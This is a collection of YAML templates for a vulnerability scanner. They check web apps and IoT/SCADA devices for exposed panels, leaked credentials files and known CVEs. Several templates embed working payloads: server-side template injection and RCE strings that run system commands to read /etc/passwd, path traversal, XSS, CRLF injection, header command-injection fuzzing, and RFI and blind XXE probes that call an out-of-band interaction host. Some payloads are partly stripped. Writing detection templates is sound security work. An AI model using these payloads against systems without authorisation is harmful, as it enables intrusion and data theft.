header 26 | words: 27 | - "text/html" 28 | -------------------------------------------------------------------------------- /laravel-telescope.yaml: -------------------------------------------------------------------------------- 1 | id: laravel-telescope 2 | 3 | info: 4 | name: Laravel Telescope Disclosure 5 | author: geeknik 6 | description: Telescope provides insight into the requests coming into your application, exceptions, log entries, database queries, queued jobs, mail, notifications, cache operations, scheduled tasks, variable dumps, and more. 7 | reference: https://laravel.com/docs/8.x/telescope 8 | severity: medium 9 | tags: laravel,disclosure,logs 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - "{{BaseURL}}/telescope/requests" 15 | 16 | redirects: true 17 | matchers: 18 | - type: word 19 | words: 20 | - "Telescope" 21 | - "Requests" 22 | - "Commands" 23 | - "Schedule" 24 | condition: and 25 | -------------------------------------------------------------------------------- /openstack-user-secrets.yaml: -------------------------------------------------------------------------------- 1 | id: openstack-user-secrets 2 | 3 | info: 4 | name: Openstack User Secrets 5 | author: geeknik 6 | reference: https://github.com/openstack/openstack-ansible/blob/master/etc/openstack_deploy/user_secrets.yml 7 | severity: high 8 | tags: openstack,config,auth 9 | 10 | requests: 11 | - method: GET 12 | path: 13 | - "{{BaseURL}}/user_secrets.yml" 14 | - "{{BaseURL}}/user_secrets.yml.old" 15 | 16 | matchers-condition: and 17 | matchers: 18 | - type: status 19 | status: 20 | - 200 21 | - type: word 22 | part: body 23 | words: 24 | - "############################# WARNING" 25 | - "may break your OpenStack environment" 26 | - "#NOTE: Please uncomment those" 27 | condition: and 28 | -------------------------------------------------------------------------------- /cacti-detect.yaml: -------------------------------------------------------------------------------- 1 | id: cacti-detect 2 | info: 3 | name: Detect Cacti 4 | author: geeknik 5 | description: Cacti is a complete network graphing solution -- https://www.cacti.net/ 6 | severity: info 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - "{{BaseURL}}" 12 | - "{{BaseURL}}/cacti/" 13 | 14 | matchers-condition: and 15 | matchers: 16 | - type: status 17 | status: 18 | - 200 19 | - type: word 20 | part: body 21 | words: 22 | - "Login to Cacti" 23 | - "The Cacti Group" 24 | condition: and 25 | 26 | - type: regex 27 | part: header 28 | regex: 29 | - Cacti+ 30 | 31 | extractors: 32 | - type: kval 33 | part: header 34 | kval: 35 | - Set-Cookie 36 | -------------------------------------------------------------------------------- /node-nunjucks-ssti.yaml: -------------------------------------------------------------------------------- 1 | id: node-nunjucks-ssti 2 | 3 | info: 4 | name: Node Nunjucks SSTI 5 | description: Nunjucks is a template engine for by Jinja2 used to develop web applications on Node.js web frameworks as Express or Connect. 6 | reference: https://disse.cting.org/2016/08/02/2016-08-02-sandbox-break-out-nunjucks-template-engine 7 | author: geeknik 8 | severity: high 9 | tags: node,nunjucks,ssti 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - "{{BaseURL}}/page?name={{range.constructor(\"return global.process.mainModule.require('child_process').execSync('tail /etc/passwd')\")()}}" 15 | 16 | matchers-condition: and 17 | matchers: 18 | - type: regex 19 | regex: 20 | - "root:[x*]:0:0:" 21 | - type: status 22 | status: 23 | - 200 24 | -------------------------------------------------------------------------------- /CVE-2020-24949.yaml: -------------------------------------------------------------------------------- 1 | id: CVE-2020-24949 2 | 3 | info: 4 | name: PHPFusion 9.03.50 Remote Code Execution 5 | author: geeknik 6 | severity: high 7 | description: Privilege escalation in PHP-Fusion 9.03.50 downloads/downloads.php allows an authenticated user (not admin) to send a crafted request to the server and perform remote command execution (RCE). 8 | reference: https://packetstormsecurity.com/files/162852/phpfusion90350-exec.txt 9 | tags: cve,cve2020,phpfusion,rce 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - "{{BaseURL}}/infusions/downloads/downloads.php?cat_id=${system(cat /etc/passwd)}" 15 | 16 | matchers-condition: and 17 | matchers: 18 | - type: status 19 | status: 20 | - 200 21 | - type: regex 22 | regex: 23 | - "root:[x*]:0:0:" 24 | -------------------------------------------------------------------------------- /huawei-dg8045-auth-bypass.yaml: -------------------------------------------------------------------------------- 1 | id: huawei-dg8045-auth-bypass 2 | 3 | info: 4 | name: Huawei dg8045 - Authentication Bypass 5 | description: The default password of this router is the last 8 characters of the device's serial number which exist in the back of the device and via the web app API as seen below. 6 | reference: https://www.exploit-db.com/exploits/50059 7 | author: geeknik 8 | severity: high 9 | tags: huawei,dg8045,auth,bypass 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - "{{BaseURL}}/api/system/deviceinfo" 15 | 16 | matchers-condition: and 17 | matchers: 18 | - type: status 19 | status: 20 | - 200 21 | - type: word 22 | words: 23 | - "DeviceName" 24 | - "SerialNumber" 25 | - "VER.A" 26 | condition: and 27 | -------------------------------------------------------------------------------- /upnp-device.yaml: -------------------------------------------------------------------------------- 1 | id: upnp-device-detect 2 | 3 | info: 4 | name: Detect Basic uPNP Device 5 | author: geeknik 6 | reference: https://www.upnp.org/specs/basic/UPnP-basic-Basic-v1-Device.pdf 7 | severity: info 8 | tags: upnp,iot 9 | 10 | requests: 11 | - method: GET 12 | path: 13 | - "{{BaseURL}}" 14 | 15 | matchers-condition: and 16 | matchers: 17 | - type: status 18 | status: 19 | - 200 20 | - type: word 21 | words: 22 | - "urn:schemas-upnp-org:device-1-0" 23 | - "" 24 | - "" 25 | part: body 26 | condition: and 27 | 28 | extractors: 29 | - type: regex 30 | name: model 31 | regex: 32 | - .* 33 | - .* 34 | -------------------------------------------------------------------------------- /vscode-sftp.yaml: -------------------------------------------------------------------------------- 1 | id: vscode-sftp 2 | 3 | info: 4 | name: vscode sftp credentials 5 | author: geeknik 6 | description: Created by vscode-sftp for VSCode, contains SFTP/SSH server details and credentials 7 | severity: high 8 | tags: vscode,sftp,ssh 9 | 10 | requests: 11 | - method: GET 12 | path: 13 | - "{{BaseURL}}/sftp.json" 14 | - "{{BaseURL}}/.config/sftp.json" 15 | - "{{BaseURL}}/.vscode/sftp.json" 16 | 17 | matchers-condition: and 18 | matchers: 19 | - type: word 20 | part: header 21 | words: 22 | - "application/json" 23 | - type: status 24 | status: 25 | - 200 26 | - type: word 27 | words: 28 | - "name" 29 | - "host" 30 | - "protocol" 31 | - "username" 32 | condition: and 33 | -------------------------------------------------------------------------------- /detect-tracer-sc-web.yaml: -------------------------------------------------------------------------------- 1 | id: detect-tracer-sc-web 2 | 3 | info: 4 | name: Detects Tracer SC Web UI 5 | author: geeknik 6 | reference: https://www.trane.com/commercial/north-america/us/en/products-systems/building-management---automation/building-automation-systems/tracer-sc-plus.html 7 | severity: info 8 | tags: tracer,trane,iot 9 | 10 | requests: 11 | - method: GET 12 | path: 13 | - "{{BaseURL}}/hui/index.html" 14 | 15 | matchers-condition: and 16 | matchers: 17 | - type: status 18 | status: 19 | - 200 20 | - type: word 21 | words: 22 | - "Tracer SC" 23 | - "> Tracer SC " 24 | - "By accessing Tracer SC+," 25 | condition: and 26 | - type: word 27 | part: header 28 | words: 29 | - "text/html" 30 | -------------------------------------------------------------------------------- /CVE-2018-16671.yaml: -------------------------------------------------------------------------------- 1 | id: CVE-2018-16671 2 | 3 | info: 4 | name: CirCarLife SCADA Device ID 5 | description: System software information disclosure due to lack of authentication 6 | reference: 7 | - https://www.exploit-db.com/exploits/45384 8 | author: geeknik 9 | severity: medium 10 | tags: cve,cve2018,circarlife,scada,iot,disclosure 11 | 12 | requests: 13 | - method: GET 14 | path: 15 | - "{{BaseURL}}/html/device-id" 16 | 17 | matchers-condition: and 18 | matchers: 19 | - type: word 20 | part: header 21 | words: 22 | - "CirCarLife Scada" 23 | - type: word 24 | part: body 25 | words: 26 | - "circontrol" 27 | - type: regex 28 | part: body 29 | regex: 30 | - "(19|20)\\d\\d[- /.](0[1-9]|1[012])[- /.](0[1-9]|[12][0-9]|3[01])" 31 | -------------------------------------------------------------------------------- /CVE-2020-23517.yaml: -------------------------------------------------------------------------------- 1 | id: CVE-2020-23517 2 | 3 | info: 4 | name: Aryanic HighMail (High CMS) XSS 5 | author: geeknik 6 | severity: medium 7 | description: XSS vulnerability in Aryanic HighMail (High CMS) versions 2020 and before allows remote attackers to inject arbitrary web script or HTML, via 'user' to LoginForm. 8 | reference: https://vulnerabilitypublishing.blogspot.com/2021/03/aryanic-highmail-high-cms-reflected.html 9 | tags: xss,cve,cve2020 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - "{{BaseURL}}/login/?uid=\">" 15 | 16 | matchers-condition: and 17 | matchers: 18 | - type: word 19 | words: 20 | - text/html 21 | part: header 22 | - type: word 23 | words: 24 | - " 7 | reference: https://www.exploit-db.com/exploits/49986 8 | severity: high 9 | tags: solarlog 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - "{{BaseURL}}/lan.html" 15 | 16 | matchers-condition: and 17 | matchers: 18 | - type: status 19 | status: 20 | - 200 21 | - type: word 22 | part: header 23 | words: 24 | - "IPC@CHIP" 25 | - type: word 26 | part: body 27 | words: 28 | - " Solare Datensysteme GmbH" 29 | - "mailto:info@solar-log.com" 30 | condition: and 31 | -------------------------------------------------------------------------------- /CVE-2021-3374.yaml: -------------------------------------------------------------------------------- 1 | id: CVE-2021-3374 2 | 3 | info: 4 | name: Rstudio Shiny Server Directory Traversal 5 | author: geeknik 6 | description: Rstudio Shiny-Server prior to 1.5.16 is vulnerable to directory traversal and source code leakage. This can be exploited by appending an encoded slash to the URL. 7 | reference: https://github.com/colemanjp/rstudio-shiny-server-directory-traversal-source-code-leak 8 | severity: medium 9 | tags: cve,cve2021,rstudio,traversal 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - "{{BaseURL}}/%2f/" 15 | - "{{BaseURL}}/sample-apps/hello/%2f/" 16 | 17 | matchers-condition: and 18 | matchers: 19 | - type: status 20 | status: 21 | - 200 22 | - type: word 23 | words: 24 | - "Index of /" 25 | - type: regex 26 | part: body 27 | regex: 28 | - "[A-Za-z].*\\.R" 29 | -------------------------------------------------------------------------------- /detect-workerman-websocket-server.yaml: -------------------------------------------------------------------------------- 1 | id: detect-workerman-websocket-server 2 | 3 | info: 4 | name: Detects Workerman websockets server 5 | reference: 6 | - https://www.workerman.net/en/ 7 | - https://github.com/walkor/Workerman 8 | author: geeknik 9 | severity: info 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - "{{BaseURL}}" 15 | 16 | matchers-condition: and 17 | matchers: 18 | - type: word 19 | part: header 20 | words: 21 | - 'workerman' 22 | - type: word 23 | part: body 24 | words: 25 | - '

Websocket

' 26 | - 'workerman' 27 | condition: and 28 | - type: status 29 | status: 30 | - 200 31 | extractors: 32 | - type: regex 33 | part: header 34 | name: version 35 | regex: 36 | - 'workerman\/\d\.\d\.\d' 37 | -------------------------------------------------------------------------------- /CVE-2009-4223.yaml: -------------------------------------------------------------------------------- 1 | id: CVE-2009-4223 2 | 3 | info: 4 | name: KR-Web <= 1.1b2 RFI 5 | description: KR is a web content-server based on Apache-PHP-MySql technology who gives to internet programmers some PHP classes semplifying database content access. Elsewere, it gives some admin and user tools to write, hyerarchize and authorize contents. 6 | reference: 7 | - https://sourceforge.net/projects/krw/ 8 | - https://www.exploit-db.com/exploits/10216 9 | author: geeknik 10 | severity: high 11 | tags: cve,cve2009,krweb,rfi 12 | 13 | requests: 14 | - method: GET 15 | path: 16 | - "{{BaseURL}}/adm/krgourl.php?DOCUMENT_ROOT=http://{{interactsh-url}}/file.txt" 17 | 18 | matchers-condition: and 19 | matchers: 20 | - type: status 21 | status: 22 | - 200 23 | - type: word 24 | part: interactsh_protocol 25 | words: 26 | - "http" 27 | -------------------------------------------------------------------------------- /jetbrains-webservers-xml.yaml: -------------------------------------------------------------------------------- 1 | id: jetbrains-webservers-xml 2 | 3 | info: 4 | name: Jetbrains IDE WebServers.xml 5 | author: geeknik 6 | description: Created by Jetbrains IDEs, contains webserver credentials with encoded passwords 7 | severity: low 8 | tags: jetbrains,config 9 | 10 | requests: 11 | - method: GET 12 | path: 13 | - "{{BaseURL}}/.idea/WebServers.xml" 14 | - "{{BaseURL}}/.idea/webServers.xml" 15 | - "{{BaseURL}}/.idea/webservers.xml" 16 | 17 | matchers-condition: and 18 | matchers: 19 | - type: word 20 | part: header 21 | words: 22 | - "application/xml" 23 | - "text/xml" 24 | condition: or 25 | - type: word 26 | part: body 27 | words: 28 | - "" 31 | - type: status 32 | status: 33 | - 200 34 | -------------------------------------------------------------------------------- /landfill-remote-monitoring-control.yaml: -------------------------------------------------------------------------------- 1 | id: landfill-remote-monitoring-control 2 | 3 | info: 4 | name: SCS Landfill Remote Monitoring Control 5 | description: SCS RMC is the IoT for landfills, manufacturing, and industrial facilities that provides real-time viewing, analysis, and control of equipment and systems critical to production and safe operations remotely. 6 | reference: https://www.scsengineers.com/services/remote-monitoring-control/ 7 | author: geeknik 8 | severity: info 9 | tags: panel,scs,rmc,iot 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - "{{BaseURL}}" 15 | 16 | redirects: true 17 | matchers-condition: and 18 | matchers: 19 | - type: status 20 | status: 21 | - 200 22 | - type: word 23 | words: 24 | - "Log in to SCS RMC®" 25 | - "SCS RMC®" 26 | condition: and 27 | -------------------------------------------------------------------------------- /CVE-2019-15859.yaml: -------------------------------------------------------------------------------- 1 | id: CVE-2019-15859 2 | 3 | info: 4 | name: Socomec DIRIS Password Disclosure 5 | author: geeknik 6 | description: Password disclosure in the web interface on socomec DIRIS A-40 devices before 48250501 allows a remote attacker to get full access to a device via the /password.jsn URI. 7 | reference: https://seclists.org/fulldisclosure/2019/Oct/10 8 | severity: critical 9 | tags: cve,cve2019,disclosure,socomec,diris,iot 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - "{{BaseURL}}/password.jsn" 15 | 16 | matchers-condition: and 17 | matchers: 18 | - type: status 19 | status: 20 | - 200 21 | - type: word 22 | words: 23 | - "text/json" 24 | part: header 25 | - type: word 26 | words: 27 | - "username" 28 | - "password" 29 | part: body 30 | condition: and 31 | -------------------------------------------------------------------------------- /CVE-2021-32820.yaml: -------------------------------------------------------------------------------- 1 | id: CVE-2021-32820 2 | 3 | info: 4 | name: File disclosure in Express Handlebars 5 | author: geeknik 6 | description: By allowing template engine configuration options to be passed through the Express render API directly, downstream users of an Express template engine may inadvertently introduce insecure behavior into their applications with impacts ranging from Cross Site Scripting (XSS) to Remote Code Execution (RCE). 7 | reference: https://securitylab.github.com/advisories/GHSL-2021-018-express-handlebars/ 8 | severity: medium 9 | tags: cve,cve2021,express,handlebars,disclosure 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - "{{BaseURL}}/?layout=/etc/resolv.conf" 15 | 16 | matchers-condition: and 17 | matchers: 18 | - type: status 19 | status: 20 | - 200 21 | - type: word 22 | words: 23 | - "nameserver " 24 | -------------------------------------------------------------------------------- /CVE-2007-0885.yaml: -------------------------------------------------------------------------------- 1 | id: CVE-2007-0885 2 | 3 | info: 4 | name: Rainbow.Zen Jira XSS 5 | description: Cross-site scripting (XSS) vulnerability in jira/secure/BrowseProject.jspa in Rainbow with the Zen (Rainbow.Zen) extension allows remote attackers to inject arbitrary web script or HTML via the id parameter. 6 | reference: https://www.securityfocus.com/archive/1/459590/100/0/threaded 7 | author: geeknik 8 | severity: medium 9 | tags: cve,cve2007,jira,xss 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - "{{BaseURL}}/jira/secure/BrowseProject.jspa?id=\">" 15 | 16 | matchers-condition: and 17 | matchers: 18 | - type: word 19 | words: 20 | - "\">" 21 | - type: status 22 | status: 23 | - 200 24 | - type: word 25 | part: header 26 | - "text/html" 27 | -------------------------------------------------------------------------------- /spidercontrol-scada-server-info.yaml: -------------------------------------------------------------------------------- 1 | id: spidercontrol-scada-server-info 2 | 3 | info: 4 | name: SpiderControl SCADA Web Server Info Exposure 5 | author: geeknik 6 | description: Numerous, market-leading OEM manufacturers - from a wide variety of industries - rely on SpiderControl. 7 | reference: https://spidercontrol.net/spidercontrol-inside/ 8 | severity: high 9 | tags: spidercontrol,scada,exposure 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - '{{BaseURL}}/cgi-bin/GetSrvInfo.exe' 15 | matchers-condition: and 16 | matchers: 17 | - type: status 18 | status: 19 | - 200 20 | - type: word 21 | words: 22 | - "powered by SpiderControl" 23 | - "LSWEBSERVER" 24 | - "SCWEBSERVICES" 25 | condition: and 26 | extractors: 27 | - type: kval 28 | part: header 29 | kval: 30 | - Server 31 | -------------------------------------------------------------------------------- /monitorix-exposure.yaml: -------------------------------------------------------------------------------- 1 | id: monitorix-exposure 2 | info: 3 | name: Monitorix 4 | author: geeknik 5 | description: Monitorix is a free, open source, lightweight system monitoring tool designed to monitor as many services and system resources as possible. 6 | reference: https://www.monitorix.org/ 7 | severity: low 8 | tags: monitorix,exposure,logs 9 | 10 | requests: 11 | - method: GET 12 | path: 13 | - "{{BaseURL}}/monitorix-cgi/monitorix.cgi?mode=localhost&graph=all&when=1day" 14 | 15 | matchers-condition: and 16 | matchers: 17 | - type: word 18 | part: body 19 | words: 20 | - "" 21 | - "Global kernel usage" 22 | - "Kernel usage per processor" 23 | - "" 24 | - "1day.png'" 25 | condition: and 26 | - type: status 27 | status: 28 | - 200 29 | -------------------------------------------------------------------------------- /old-copyright.yaml: -------------------------------------------------------------------------------- 1 | id: old-copyright 2 | 3 | info: 4 | name: Find pages with old copyright dates 5 | author: geeknik 6 | severity: info 7 | tags: misc 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}" 13 | 14 | redirects: true 15 | max-redirects: 3 16 | matchers-condition: and 17 | matchers: 18 | - type: word 19 | words: 20 | - '2021' 21 | part: body 22 | negative: true 23 | 24 | - type: regex 25 | part: body 26 | regex: 27 | - 'Copyright [1-9]\d*' 28 | - '© [1-9]\d*' 29 | - '© [1-9]\d*' 30 | - '© [1-9]\d*' 31 | extractors: 32 | - type: regex 33 | part: body 34 | name: copyright_year 35 | regex: 36 | - 'Copyright [1-9]\d*' 37 | - '© [1-9]\d*' 38 | - '© [1-9]\d*' 39 | - '© [1-9]\d*' 40 | -------------------------------------------------------------------------------- /yii-debugger.yaml: -------------------------------------------------------------------------------- 1 | id: yii-debugger 2 | 3 | info: 4 | name: View Yii Debugger Information 5 | author: geeknik 6 | reference: https://yii2-framework.readthedocs.io/en/stable/guide/tool-debugger/ 7 | severity: info 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/debug/default/view.html" 13 | - "{{BaseURL}}/debug/default/view" 14 | - "{{BaseURL}}/frontend/web/debug/default/view" 15 | - "{{BaseURL}}/web/debug/default/view" 16 | - "{{BaseURL}}/sapi/debug/default/view" 17 | 18 | redirects: true 19 | matchers-condition: and 20 | matchers: 21 | - type: status 22 | status: 23 | - 200 24 | - type: word 25 | words: 26 | - "Yii Debugger" 27 | - "Status" 28 | - "Route" 29 | - "Log" 30 | - "Time" 31 | - "Memory" 32 | - "DB" 33 | condition: and 34 | -------------------------------------------------------------------------------- /blind-xxe.yaml: -------------------------------------------------------------------------------- 1 | id: blind-xxe 2 | 3 | info: 4 | name: Blind XXE 5 | author: geeknik 6 | severity: high 7 | 8 | requests: 9 | - raw: 10 | - | 11 | POST / HTTP/1.1 12 | Host: {{Hostname}} 13 | User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 14 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 15 | Accept-Language: en-US,en;q=0.5 16 | Accept-Encoding: gzip,deflate 17 | Referer: {{BaseURL}} 18 | Content-Type: text/xml 19 | Content-Length: 112 20 | Connection: close 21 | 22 | 23 | 24 | &e1; 25 | 26 | redirects: true 27 | matchers: 28 | - type: word 29 | part: interactsh_protocol 30 | words: 31 | - "dns" 32 | - "http" 33 | condition: or 34 | -------------------------------------------------------------------------------- /viewlinc-crlf-injection.yaml: -------------------------------------------------------------------------------- 1 | id: viewlinc-crlf-injection 2 | 3 | info: 4 | name: viewLinc viewLinc/5.1.2.367 (and sometimes 5.1.1.50) is vulnerable to CRLF Injection. 5 | author: geeknik 6 | severity: low 7 | reference: https://www.vaisala.com/en/products/systems/indoor-monitoring-systems/viewlinc-continuous-monitoring-system 8 | tags: crlf,viewlinc 9 | 10 | requests: 11 | - method: GET 12 | path: 13 | - "{{BaseURL}}/%0ASet-Cookie:crlfinjection=crlfinjection" 14 | 15 | matchers-condition: or 16 | matchers: 17 | - type: word 18 | words: 19 | - "Server: viewLinc/5.1.2.367" 20 | - "Set-Cookie: crlfinjection=crlfinjection" 21 | part: header 22 | condition: and 23 | 24 | - type: word 25 | words: 26 | - "Server: viewLinc/5.1.1.50" 27 | - "Set-Cookie: crlfinjection=crlfinjection" 28 | part: header 29 | condition: and 30 | -------------------------------------------------------------------------------- /CVE-2016-0957.yaml: -------------------------------------------------------------------------------- 1 | id: CVE-2016-0957 2 | 3 | info: 4 | name: Adobe AEM Console Disclosure 5 | author: geeknik 6 | description: Dispatcher before 4.1.5 in Adobe Experience Manager 5.6.1, 6.0.0, and 6.1.0 does not properly implement a URL filter, which allows remote attackers to bypass dispatcher rules via unspecified vectors. 7 | reference: https://www.kernelpicnic.net/2016/07/24/Microsoft-signout.live.com-Remote-Code-Execution-Write-Up.html 8 | severity: high 9 | tags: cve,cve2016,adobe,aem 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - "{{BaseURL}}/system/console?.css" 15 | headers: 16 | Authorization: "Basic YWRtaW46YWRtaW4K" 17 | 18 | matchers-condition: and 19 | matchers: 20 | - type: status 21 | status: 22 | - 200 23 | - type: word 24 | words: 25 | - "Adobe" 26 | - "java.lang" 27 | - "(Runtime)" 28 | condition: and 29 | -------------------------------------------------------------------------------- /apache-filename-brute-force.yaml: -------------------------------------------------------------------------------- 1 | id: apache-filename-brute-force 2 | info: 3 | name: Apache Filename Brute Force 4 | author: geeknik 5 | description: If the client provides an invalid Accept header, the server will respond with a 406 Not Acceptable error containing a pseudo directory listing. 6 | reference: | 7 | - https://hackerone.com/reports/210238 8 | - https://www.acunetix.com/vulnerabilities/web/apache-mod_negotiation-filename-bruteforcing/ 9 | severity: low 10 | tags: apache 11 | 12 | requests: 13 | - method: GET 14 | headers: 15 | Accept: "fake/value" 16 | path: 17 | - "{{BaseURL}}/index" 18 | 19 | matchers-condition: and 20 | matchers: 21 | - type: status 22 | status: 23 | - 406 24 | - type: word 25 | words: 26 | - "Not Acceptable" 27 | - "Available variants:" 28 | - "
Apache Server at" 29 | condition: and 30 | -------------------------------------------------------------------------------- /git-mailmap.yaml: -------------------------------------------------------------------------------- 1 | id: git-mailmap 2 | 3 | info: 4 | name: Detect Git Mailmap 5 | author: geeknik 6 | reference: https://man7.org/linux/man-pages/man5/gitmailmap.5.html 7 | severity: low 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/.mailmap" 13 | 14 | matchers-condition: and 15 | matchers: 16 | - type: regex 17 | part: body 18 | regex: 19 | - "(?:[a-z0-9!#$%&'*+/=?^_`{|}~-]+(?:\\.[a-z0-9!#$%&'*+/=?^_`{|}~-]+)*|\"(?:[\\x01-\\x08\\x0b\\x0c\\x0e-\\x1f\\x21\\x23-\\x5b\\x5d-\\x7f]|\\\\[\\x01-\\x09\\x0b\\x0c\\x0e-\\x7f])*\")@(?:(?:[a-z0-9](?:[a-z0-9-]*[a-z0-9])?\\.)+[a-z0-9](?:[a-z0-9-]*[a-z0-9])?|\\[(?:(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\\.){3}(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?|[a-z0-9-]*[a-z0-9]:(?:[\\x01-\\x08\\x0b\\x0c\\x0e-\\x1f\\x21-\\x5a\\x53-\\x7f]|\\\\[\\x01-\\x09\\x0b\\x0c\\x0e-\\x7f])+)\\])" 20 | - type: status 21 | status: 22 | - 200 23 | -------------------------------------------------------------------------------- /CVE-2021-31800.yaml: -------------------------------------------------------------------------------- 1 | id: CVE-2021-31800 2 | info: 3 | name: impacket directory traversal 4 | author: geeknik 5 | description: Multiple path traversal vulnerabilities exist in smbserver.py in Impacket through 0.9.22. An attacker that connects to a running smbserver instance can list and write to arbitrary files via ../ directory traversal. This could potentially be abused to achieve arbitrary code execution by replacing /etc/shadow or an SSH authorized key. 6 | reference: https://github.com/SecureAuthCorp/impacket/commit/49c643bf66620646884ed141c94e5fdd85bcdd2f 7 | severity: high 8 | tags: impacket,cve,cve2021,traversal 9 | 10 | requests: 11 | - method: GET 12 | path: 13 | - "{{BaseURL}}/public/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd" 14 | 15 | matchers-condition: and 16 | matchers: 17 | - type: status 18 | status: 19 | - 200 20 | - type: regex 21 | regex: 22 | - "root:[x*]:0:0:" 23 | -------------------------------------------------------------------------------- /header-command-injection.yaml: -------------------------------------------------------------------------------- 1 | id: header-command-injection 2 | 3 | info: 4 | name: Header Command Injection 5 | author: geeknik 6 | severity: high 7 | description: Fuzzing headers for command injection 8 | tags: fuzz,rce 9 | 10 | requests: 11 | - payloads: 12 | header: helpers/payloads/request-headers.txt 13 | payload: helpers/payloads/command-injection.txt 14 | 15 | raw: 16 | - | 17 | GET /?§header§ HTTP/1.1 18 | Host: {{Hostname}} 19 | User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 20 | §header§: §payload§ 21 | Connection: close 22 | 23 | attack: clusterbomb 24 | redirects: true 25 | matchers-condition: or 26 | matchers: 27 | - type: word 28 | words: 29 | - "uid=" 30 | - "gid=" 31 | - "groups=" 32 | condition: and 33 | 34 | - type: regex 35 | regex: 36 | - "root:[x*]:0:0:" 37 | -------------------------------------------------------------------------------- /CVE-2020-19625.yaml: -------------------------------------------------------------------------------- 1 | id: CVE-2020-19625 2 | info: 3 | name: Gridx 1.3 RCE 4 | author: geeknik 5 | description: Remote Code Execution vulnerability in tests/support/stores/test_grid_filter.php in oria gridx 1.3, allows remote attackers to execute arbitrary code, via crafted value to the $query parameter. 6 | reference: https://github.com/oria/gridx/issues/433 7 | severity: high 8 | tags: cve,cve2020,gridx,rce 9 | 10 | requests: 11 | - method: GET 12 | path: 13 | - "{{BaseURL}}/tests/support/stores/test_grid_filter.php?query=phpinfo();" 14 | 15 | matchers-condition: and 16 | matchers: 17 | - type: status 18 | status: 19 | - 200 20 | - type: word 21 | words: 22 | - "PHP Extension" 23 | - "PHP Version" 24 | condition: and 25 | extractors: 26 | - type: regex 27 | part: body 28 | group: 1 29 | regex: 30 | - '

PHP Version ([0-9.]+)<\/h1>' 31 | -------------------------------------------------------------------------------- /db-schema.yaml: -------------------------------------------------------------------------------- 1 | id: db-schema 2 | 3 | info: 4 | name: Discover db schema files 5 | description: This file is auto-generated from the current state of the database. 6 | author: geeknik 7 | severity: info 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/db/schema.rb" 13 | - "{{BaseURL}}/database/schema.rb" 14 | - "{{BaseURL}}/schema.rb" 15 | 16 | matchers-condition: and 17 | matchers: 18 | - type: word 19 | words: 20 | - "This file is auto-generated from the current state of the database." 21 | - "ActiveRecord::Schema.define" 22 | condition: and 23 | - type: word 24 | part: header 25 | words: 26 | - "text/html" 27 | negative: true 28 | - type: status 29 | status: 30 | - 200 31 | extractors: 32 | - type: regex 33 | name: version 34 | part: body 35 | regex: 36 | - 'version: \d{14}' 37 | -------------------------------------------------------------------------------- /CVE-2021-31537.yaml: -------------------------------------------------------------------------------- 1 | id: CVE-2021-31537 2 | 3 | info: 4 | name: SIS-REWE GO version 7.5.0/12C XSS 5 | author: geeknik 6 | description: SIS SIS-REWE Go before 7.7 SP17 allows XSS via rewe/prod/web/index.php (affected parameters are config, version, win, db, pwd, and user) and /rewe/prod/web/rewe_go_check.php (version and all other parameters). 7 | reference: https://sec-consult.com/vulnerability-lab/advisory/reflected-xss-sis-infromatik-rewe-go-cve-2021-31537/ 8 | severity: medium 9 | tags: cve,cve2021,xss 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - "{{BaseURL}}/rewe/prod/web/rewe_go_check.php?config=rewe&version=7.5.0%3cscript%3econfirm({{randstr}})%3c%2fscript%3e&win=2707" 15 | 16 | matchers-condition: and 17 | matchers: 18 | - type: word 19 | part: body 20 | words: 21 | - "" 22 | - type: word 23 | part: header 24 | words: 25 | - "text/html" 26 | -------------------------------------------------------------------------------- /CVE-2014-2321.yaml: -------------------------------------------------------------------------------- 1 | id: CVE-2014-2321 2 | 3 | info: 4 | name: ZTE Cable Modem Web Shell 5 | description: web_shell_cmd.gch on ZTE F460 and F660 cable modems allows remote attackers to obtain administrative access via sendcmd requests, as demonstrated by using "set TelnetCfg" commands to enable a TELNET service with specified credentials. 6 | author: geeknik 7 | reference: 8 | - https://yosmelvin.wordpress.com/2017/09/21/f660-modem-hack/ 9 | - https://jalalsela.com/zxhn-h108n-router-web-shell-secrets/ 10 | severity: high 11 | tags: iot,cve,cve2014,zte 12 | 13 | requests: 14 | - method: GET 15 | path: 16 | - "{{BaseURL}}/web_shell_cmd.gch" 17 | 18 | matchers-condition: and 19 | matchers: 20 | - type: word 21 | words: 22 | - "please input shell command" 23 | - "ZTE Corporation. All rights reserved" 24 | part: body 25 | condition: and 26 | 27 | - type: status 28 | status: 29 | - 200 30 | -------------------------------------------------------------------------------- /darkstat-detect.yaml: -------------------------------------------------------------------------------- 1 | id: darkstat-detect 2 | 3 | info: 4 | name: Detect Darkstat Reports 5 | author: geeknik 6 | description: Darkstat captures network traffic, calculates statistics about usage, and serves reports over HTTP 7 | reference: https://unix4lyfe.org/darkstat/ 8 | severity: high 9 | tags: darkstat,logs,exposure 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - "{{BaseURL}}" 15 | - "{{BaseURL}}/darkstat/" 16 | # 